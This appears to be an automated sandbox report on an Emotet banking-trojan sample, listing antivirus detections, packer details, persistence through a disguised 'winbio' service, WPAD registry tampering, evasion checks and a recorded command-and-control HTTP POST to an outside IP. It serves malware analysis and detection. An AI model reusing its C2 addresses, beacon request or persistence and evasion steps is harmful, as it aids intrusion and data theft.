11.4
0-day

3975b726fe697572122e18d1fff000a7ea3606bdf64d521448e7e7fac3f0f3dd

c531959b120a5197f3a692f204ea54f1.exe

Analysis time

123s

Last analyzed

File size

92.0KB
Static detection: malicious. Dynamic detection: malicious. Tags: 100% AI SCORE=85 AIDETECTVM ATTRIBUTE BANKERX BSCOPE CLASSIC CONFIDENCE DKADF DOWNLOADER33 EJQB ELDORADO EMOTET EMOTETU ENCPK FQ0@AWYDO3KI FQ0@BWYDO3KI GENCIRC GENKRYPTIK HDZF HIGH CONFIDENCE HIGHCONFIDENCE HLCZVX KRYPTIK MALWARE1 MALWARE@#38Q5WAB6N0DHX R + MAL RNBNI61JWZK SCORE SMTHC SUSGEN UNSAFE ZENPAK ZEXAF
Hawkeye engine
Not detected: no Hawkeye engine results available
Static verdict
Antivirus engines
Engine Result Scan date Engine version
Alibaba Trojan:Win32/Emotet.b5e0b084 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:BankerX-gen [Trj] 20201228 21.1.5827.0
Tencent Malware.Win32.Gencirc.10b9ec79 20201228 1.0.0.1
Kingsoft 20201228 2017.9.26.565
McAfee Emotet-FQU!C531959B120A 20201228 6.0.6.653
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Static indicators
Queries for the computer name (1 event)
Time & API Arguments Status Return Repeated
1619942166.80725
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (6 events)
Time & API Arguments Status Return Repeated
1619942156.16725
CryptGenKey
crypto_handle: 0x00567f70
algorithm_identifier: 0x0000660e ()
provider_handle: 0x00567108
flags: 1
key: f %á‘véè3AthoX
success 1 0
1619942166.87025
CryptExportKey
crypto_handle: 0x00567f70
crypto_export_handle: 0x005646c0
buffer: f¤éºM—J«›Ä"ªoš§ò!.ÑYtúÏrïøÜ|¯b¦1°Tz´+û̧¢œ&Þ#¾T…×ÔæéQp;5ã$¹nXÖ2 Û?Qᘠ²H&‡æ§ÎÄt¡D< a6Ÿ<
blob_type: 1
flags: 64
success 1 0
1619942192.27625
CryptExportKey
crypto_handle: 0x00567f70
crypto_export_handle: 0x005646c0
buffer: f¤æk™³Åa°qèΧrszj2uÙ=ý38uûÌN* ddšÜ‡ú´œ$»†÷»µºÚ—Ó5z¤n»@F;ÉhÞç ‹8«7¯ñ,#ã!øAq˜Ë¨z8&hŽ_”nÙGÚWpÂiÍ
blob_type: 1
flags: 64
success 1 0
1619942196.40125
CryptExportKey
crypto_handle: 0x00567f70
crypto_export_handle: 0x005646c0
buffer: f¤Ë2£™Þ{$îçÁÑù½y^)ÄÏ ãf_¥cºý+Û.ÿZ<˜0-JB\¥D‘¸ Gž+_¤™r\À>¨XçTÿÜâåëÛ}séÇåÁpšŸ@J¬É×/&u¸
blob_type: 1
flags: 64
success 1 0
1619942199.97925
CryptExportKey
crypto_handle: 0x00567f70
crypto_export_handle: 0x005646c0
buffer: f¤·tò6rÁ5·´ŽpŠücÙ۝KÖÕânGæjl9Z]¾eÅ Ëy,$¡À{¾w1ºõŒP°z{4hÁL™ƒ…é˜@•­ç´+òVŽz®‹Ð5^aeÞ¸a©L[ñ×Ù
blob_type: 1
flags: 64
success 1 0
1619942222.72925
CryptExportKey
crypto_handle: 0x00567f70
crypto_export_handle: 0x005646c0
buffer: f¤åÊབƋûLÊäû‰Á!ÜÀ×õ…»oZqӒ™bΫ|8¾IÃnëPoݽ<ß÷Ç8 –l¥ÀØæ­U1녨×z7FC~Yf)t¨¨~Æ^x> ¨V -s|$+X™É
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 event)
packer Armadillo v1.71
The file contains an unknown PE resource name, possibly indicative of a packer (1 event)
resource name None
Behavioral verdict
Dynamic indicators
HTTP traffic contains suspicious features which may be indicative of malware-related traffic (1 event)
suspicious_features Connection to IP address suspicious_request POST http://139.59.12.63:8080/ay8diMN/xkmsAPit2smEyZDkd/
Performs some HTTP requests (1 event)
request POST http://139.59.12.63:8080/ay8diMN/xkmsAPit2smEyZDkd/
Sends data using the HTTP POST method (1 event)
request POST http://139.59.12.63:8080/ay8diMN/xkmsAPit2smEyZDkd/
Allocates read-write-execute memory (usually to unpack itself) (3 events)
Time & API Arguments Status Return Repeated
1619942135.713
NtAllocateVirtualMemory
process_identifier: 2632
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x02070000
success 0 0
1619942193.71325
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000003e70000
success 0 0
1619942144.13525
NtAllocateVirtualMemory
process_identifier: 1464
region_size: 40960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00480000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Creates a shortcut to an executable file (1 event)
file C:\Users\Public\Desktop\Google Chrome.lnk
Searches running processes, potentially to identify processes for sandbox evasion, code injection or memory dumping (1 event)
Moves the original executable to a new location (1 event)
Time & API Arguments Status Return Repeated
1619942139.213
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\c531959b120a5197f3a692f204ea54f1.exe
newfilepath: C:\Windows\SysWOW64\winbio\winbio.exe
newfilepath_r: C:\Windows\SysWOW64\winbio\winbio.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\c531959b120a5197f3a692f204ea54f1.exe
success 1 0
Checks adapter addresses, which can be used to detect virtual network interfaces (1 event)
Time & API Arguments Status Return Repeated
1619942167.26025
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (2 events)
entropy 7.390698492591588 section {'size_of_data': '0x0000d000', 'virtual_address': '0x0000a000', 'entropy': 7.390698492591588, 'name': '.rsrc', 'virtual_size': '0x0000c800'} description A section with a high entropy has been found
entropy 0.5909090909090909 description Overall entropy of this PE file is high
Expresses interest in specific running processes (1 event)
process winbio.exe
Reads the system's User Agent and subsequently performs requests (1 event)
Time & API Arguments Status Return Repeated
1619942166.99525
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
Network communication
Communicates with hosts for which no DNS query was performed (6 events)
host 124.150.175.133
host 139.59.12.63
host 172.217.24.14
host 186.80.169.128
host 190.63.7.166
host 51.38.134.203
Installs itself for autorun at Windows startup (1 event)
service_name winbio service_path C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\winbio\winbio.exe"
Created a service that was not started (1 event)
Time & API Arguments Status Return Repeated
1619942143.26
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x002e3930
display_name: winbio
error_control: 0
service_name: winbio
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\winbio\winbio.exe"
filepath_r: "C:\Windows\SysWOW64\winbio\winbio.exe"
service_manager_handle: 0x002ec538
desired_access: 2
service_type: 16
password:
success 3029296 0
Sets or modifies the WPAD proxy autoconfiguration file for traffic interception (8 events)
Time & API Arguments Status Return Repeated
1619942169.80725
RegSetValueExA
key_handle: 0x00000380
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619942169.80725
RegSetValueExA
key_handle: 0x00000380
value: ð՝(?×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619942169.80725
RegSetValueExA
key_handle: 0x00000380
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619942169.80725
RegSetValueExW
key_handle: 0x00000380
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619942169.80725
RegSetValueExA
key_handle: 0x00000398
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619942169.80725
RegSetValueExA
key_handle: 0x00000398
value: ð՝(?×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619942169.80725
RegSetValueExA
key_handle: 0x00000398
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619942169.80725
RegSetValueExW
key_handle: 0x0000037c
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Attempts to remove evidence of the file having been downloaded from the Internet (1 event)
file C:\Windows\SysWOW64\winbio\winbio.exe:Zone.Identifier
File has been identified by 58 antivirus engines on VirusTotal as malicious (50 of 58 events shown)
Bkav W32.AIDetectVM.malware1
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.EmotetU.Gen.fq0@bWydO3ki
FireEye Generic.mg.c531959b120a5197
CAT-QuickHeal Backdoor.Emotet
ALYac Trojan.EmotetU.Gen.fq0@bWydO3ki
Cylance Unsafe
K7AntiVirus Trojan ( 005600261 )
Alibaba Trojan:Win32/Emotet.b5e0b084
K7GW Trojan ( 005600261 )
Cybereason malicious.b120a5
Arcabit Trojan.EmotetU.Gen.E3BBA2
Cyren W32/Emotet.AKM.gen!Eldorado
Symantec ML.Attribute.HighConfidence
APEX Malicious
Avast Win32:BankerX-gen [Trj]
ClamAV Win.Malware.Emotet-7755663-0
Kaspersky Backdoor.Win32.Emotet.gea
BitDefender Trojan.EmotetU.Gen.fq0@bWydO3ki
NANO-Antivirus Trojan.Win32.Kryptik.hlczvx
Paloalto generic.ml
AegisLab Trojan.Win32.Emotet.L!c
Tencent Malware.Win32.Gencirc.10b9ec79
Ad-Aware Trojan.EmotetU.Gen.fq0@bWydO3ki
Sophos Mal/Generic-R + Mal/EncPk-APM
Comodo Malware@#38q5wab6n0dhx
F-Secure Trojan.TR/AD.Emotet.dkadf
DrWeb Trojan.DownLoader33.38016
VIPRE Trojan.Win32.Generic!BT
TrendMicro TrojanSpy.Win32.EMOTET.SMTHC.hp
McAfee-GW-Edition BehavesLike.Win32.Emotet.nh
MaxSecure Trojan.Malware.74690904.susgen
Emsisoft Trojan.EmotetU.Gen.fq0@bWydO3ki (B)
Ikarus Trojan-Banker.Emotet
Jiangmin Backdoor.Emotet.ec
Webroot W32.Trojan.Emotet
Avira TR/AD.Emotet.dkadf
MAX malware (ai score=85)
Antiy-AVL Trojan[Backdoor]/Win32.Emotet
Microsoft Trojan:Win32/Emotet.ARJ!MTB
ViRobot Trojan.Win32.Agent.90112.GM
ZoneAlarm Backdoor.Win32.Emotet.gea
GData Trojan.EmotetU.Gen.fq0@bWydO3ki
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Win32.Generic.C4097924
McAfee Emotet-FQU!C531959B120A
VBA32 BScope.Trojan.Zenpak
Malwarebytes Trojan.Emotet
ESET-NOD32 a variant of Win32/Kryptik.HDZF
TrendMicro-HouseCall TrojanSpy.Win32.EMOTET.SMTHC.hp
Connects to IP addresses that are no longer responding to requests (legitimate services usually remain up and running) (8 events)
dead_host 172.217.160.110:443
dead_host 192.168.56.101:49190
dead_host 172.217.24.14:443
dead_host 186.80.169.128:80
dead_host 192.168.56.101:49191
dead_host 190.63.7.166:8080
dead_host 124.150.175.133:8080
dead_host 51.38.134.203:8080
Visual analysis
Binary image
No binary image: no binary visualization was generated for this sample
Runtime screenshots
No screenshots: none were captured while the sample ran


PE Compile Time

2020-04-30 23:16:10

Imports

Library MFC42.DLL:
Library MSVCRT.dll:
0x406464 __CxxFrameHandler
0x406468 __setusermatherr
0x40646c _adjust_fdiv
0x406470 __p__commode
0x406474 __p__fmode
0x406478 __set_app_type
0x40647c _except_handler3
0x406480 _initterm
0x406484 __getmainargs
0x406488 _acmdln
0x40648c exit
0x406490 _XcptFilter
0x406494 _exit
0x406498 _onexit
0x40649c __dllonexit
0x4064a0 _ftol
0x4064a4 _purecall
0x4064a8 memmove
0x4064ac time
0x4064b0 srand
0x4064b4 rand
0x4064b8 printf
0x4064bc _setmbcp
0x4064c0 _controlfp
Library KERNEL32.dll:
0x40603c GetStartupInfoA
0x406040 GetModuleHandleA
0x406044 LoadLibraryExW
0x406048 FindResourceA
0x40604c SizeofResource
0x406050 LoadResource
Library USER32.dll:
0x4064c8 GrayStringA
0x4064cc DrawTextA
0x4064d0 TabbedTextOutA
0x4064d4 KillTimer
0x4064d8 PtInRect
0x4064dc SetTimer
0x4064e0 InvalidateRect
0x4064e4 GetClientRect
0x4064e8 EnableWindow
0x4064ec UpdateWindow
0x4064f0 GetWindowTextA
Library GDI32.dll:
0x406000 GetMapMode
0x406004 Escape
0x406008 ExtTextOutA
0x40600c TextOutA
0x406010 RectVisible
0x406014 PtVisible
0x406018 BitBlt
0x406020 LPtoDP
0x406024 CreateCompatibleDC
0x406028 GetBkColor
0x40602c DPtoLP
0x406030 GetViewportExtEx
0x406034 GetWindowExtEx

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49196 139.59.12.63 8080

UDP

Source Source Port Destination Destination Port
192.168.56.101 51963 114.114.114.114 53
192.168.56.101 53237 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 60123 114.114.114.114 53
192.168.56.101 60221 114.114.114.114 53
192.168.56.101 60384 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 49713 224.0.0.252 5355
192.168.56.101 53380 224.0.0.252 5355
192.168.56.101 53657 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 57236 224.0.0.252 5355
192.168.56.101 57874 224.0.0.252 5355
192.168.56.101 58367 224.0.0.252 5355
192.168.56.101 61680 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 62318 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355

HTTP & HTTPS Requests

URI Data
http://139.59.12.63:8080/ay8diMN/xkmsAPit2smEyZDkd/
POST /ay8diMN/xkmsAPit2smEyZDkd/ HTTP/1.1
Referer: http://139.59.12.63/ay8diMN/xkmsAPit2smEyZDkd/
Content-Type: multipart/form-data; boundary=---------------------------772117366375087
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 139.59.12.63:8080
Content-Length: 4532
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.